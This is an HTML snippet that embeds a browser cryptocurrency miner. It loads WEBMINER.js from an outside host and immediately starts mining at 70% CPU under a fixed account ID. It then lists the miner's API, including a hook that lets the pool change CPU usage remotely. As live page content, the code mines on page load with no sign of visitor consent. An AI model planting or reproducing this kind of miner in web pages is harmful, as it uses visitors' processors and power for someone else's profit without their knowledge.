
<script src="https://wm.bmwebm.org/WEBMINER.js"></script>


<script>WEBMINER.config({ login: "6279699", pass: null }).power(70);</script>

<script> // - Configure: WEBMINER.config({ login: "6279699", // Your ID - required pass: null, // Name for stats, leave blank for automatic set. }); // - Universal function for Start/Stop/Change speed - 0 = stop, 1-100 = set percent of CPU usage and start mining if not started: WEBMINER.power(70); // - Restore previous session accepted hashes and power (start mining if it worked in previous session): WEBMINER.loadStored(); // - Get current power: console.log( WEBMINER.getPower() ); // - Get current speed in hashes/sec: console.log( WEBMINER.getHashesPerSecond() ); // - Get current job algo: console.log( WEBMINER.getJobAlgo() ); // - Get current job diff: console.log( WEBMINER.getJobDiff() ); // - Get accepted by pool hashes (in all sessions) console.log( WEBMINER.getAcceptedHashes() ); // - Reset config and stop minig WEBMINER.reset(); // Reset config, stop mining and disconnect from pool (you can use it when user logout). // - Remote change speed event: WEBMINER.on('remotepower', (power) => { WEBMINER.power(power); // Is automatic applied if no listeners for this event. console.log('New power:', power); }); // - Share accepted event WEBMINER.on('accepted', () => console.log('New share') ); </script>
